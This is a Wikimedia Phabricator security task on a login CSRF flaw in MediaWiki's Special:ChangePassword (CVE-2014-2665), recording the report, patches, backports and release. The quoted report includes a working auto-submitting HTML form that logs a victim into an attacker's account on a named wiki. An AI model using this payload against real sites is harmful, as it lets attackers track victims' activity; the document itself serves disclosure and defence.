Page MenuHomePhabricator
Create Task
Maniphest T64497

Login csrf in Special:ChangePassword
Closed, ResolvedPublic
Actions

Description

Gopinath (via codex.galleryproject.org) reported a login csrf on Special:ChangePassword. Confirmed this in master. Note with the PoC, the victim must have an existing _session cookie on the target wiki, otherwise the login fails.

Special:ChangePassword should use a login token.

On Sun, Mar 9, 2014 at 12:16 PM, Bharat Mediratta <bharat@menalto.com> wrote:

Hi, Wikimedia folks - Gopinath is reporting a vulnerability in Mediawiki 1.22.3 which is running on codex.galleryproject.org - can you take a look at this and decide whether it's something you want to resolve in the Mediawiki codebase?

-Bharat

On Fri, Mar 7, 2014 at 10:14 PM, Gopinath <gopiengg@gmail.com> wrote:
Hi,
Through below CSRF Code user can be logged into the attackers account, without knowledge of user.So attacker can track the user activity.
User also wont know the attacker account password .Attacker can request password reset for his account and can get the value of wpPassword parameter.

POC Code

<html>
<head>
</head>
<body onload=document.forms[0].submit();>
<form action="http://codex.galleryproject.org/Special:ChangePassword" method="POST">

<input type="hidden" name="returnto" value="Main Page" />
<input type="hidden" name="token" value="+\" />
<input type="hidden" name="wpDomain" value="" />
<input type="hidden" name="wpName" value="Gopinath6" />
<input type="hidden" name="wpNewPassword" value=password1234 />
<input type="hidden" name="wpPassword" value=7qbuqjjsme />
<input type="hidden" name="wpRetype" value=password1234 />

</form>
</body>
</html>

Regards
Gopinath

Version: 1.23.0
Severity: normal

Details

Reference
bz62497

Event Timeline

bzimport raised the priority of this task from to High.Nov 22 2014, 2:58 AM
bzimport added projects: MW-1.23.0-release, MediaWiki-Special-pages.
bzimport set Reference to bz62497.
csteipp created this task.Mar 10 2014, 5:47 PM
csteipp added a comment.Mar 10 2014, 7:34 PM

Created attachment 14787
Add CSRF token on Special:ChangePassword

Attached:

bug62497.patch1 KBDownload

Anomie added a comment.Mar 11 2014, 3:17 PM

The patch looks good to me.

csteipp added a comment.Mar 26 2014, 1:29 PM

Early access for Wikia.

Mglaser added a comment.Mar 26 2014, 10:06 PM

Do we already have a CVE for this bug?

csteipp added a comment.Mar 26 2014, 10:15 PM

Not yet. I'll request one as soon as we make it public.

Mglaser added a comment.Mar 26 2014, 11:15 PM

Created attachment 14927
Backport to REL1_22

Backported to the best of my knowledge. Special:ChangePassword tested. Can't reproduce the attack, so someone with a deeper understanding of this vulnerability should look at it and confirm it fixes the security issue.

attachment bug62497-122.patch ignored as obsolete

csteipp added a comment.Mar 27 2014, 12:56 AM

Created attachment 14933
Backport to REL1_22

I hit a couple issues when testing your patch. I think this is a slightly better way to do it.

Attached:

bug62497_122.patch2 KBDownload

Mglaser added a comment.Mar 27 2014, 9:27 AM

Created attachment 14938
Backport to REL1_21

Backport similar to 14933, so Chris' changes are already considered. Changing passwords was tested. Please look for potentail security implications.

Attached:

bug62497_121.patch2 KBDownload

Mglaser added a comment.Mar 27 2014, 9:50 AM

Created attachment 14939
Backport to REL1_19

Considering Chris' new version of the backport for REL1_22. Tested password change. Still works.

Attached:

bug62497_119.patch2 KBDownload

Grunny added a comment.Mar 27 2014, 10:46 AM

Tested the 1.19 backport patch, and confirmed it fixes the vulnerability.

Mglaser added a comment.Mar 28 2014, 1:37 AM

Fix is released in MW 1.19.14, 1.21.8 and 1.22.5. WMF sites are patched.

Wikinaut added a comment.Mar 28 2014, 6:54 AM

Comment on attachment 14787
Add CSRF token on Special:ChangePassword

The token compare function is _not_ running in constant time. As we have a function for token comparison, we should use it here.

Wikinaut added a comment.Mar 28 2014, 7:12 AM

see http://www.gossamer-threads.com/lists/wiki/mediawiki-cvs/436923 (well, this is essential for _password_ comparison, perhaps not necessarily needed for token comparison, as already discussed elsewhere)

Aklapper added a comment.Mar 31 2014, 3:35 PM

For the records, https://www.mediawiki.org/w/index.php?title=Project:Support_desk#Session_Hijacking_error_after_Update_1.19.14_41441 lists an issue with the 1.19.14 tarball including the backport for this.

csteipp added a comment.Apr 1 2014, 4:27 PM

Markus just released 1.19.15 to fix the password reset issue.

csteipp added a comment.Apr 1 2014, 4:40 PM

Correction, Markus will release 1.19.15 tomorrow to fix the issue. Sorry about that.

csteipp added a comment.Apr 1 2014, 8:59 PM

This was assigned CVE-2014-2665.

http://openwall.com/lists/oss-security/2014/04/01/7

The MITRE email also documents their understanding of "Login CSRF", which is good background if this issue pops up again.

csteipp added a project: acl*security.Mar 26 2015, 8:39 PM
chasemp added a project: Security.Feb 10 2020, 10:56 PM
chasemp removed a project: acl*security.Feb 20 2020, 8:16 PM
Aklapper removed a subscriber: Anomie.Oct 16 2020, 5:41 PM
Content licensed under Creative Commons Attribution-ShareAlike (CC BY-SA) 4.0 unless otherwise noted; code licensed under GNU General Public License (GPL) 2.0 or later and other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL · Credits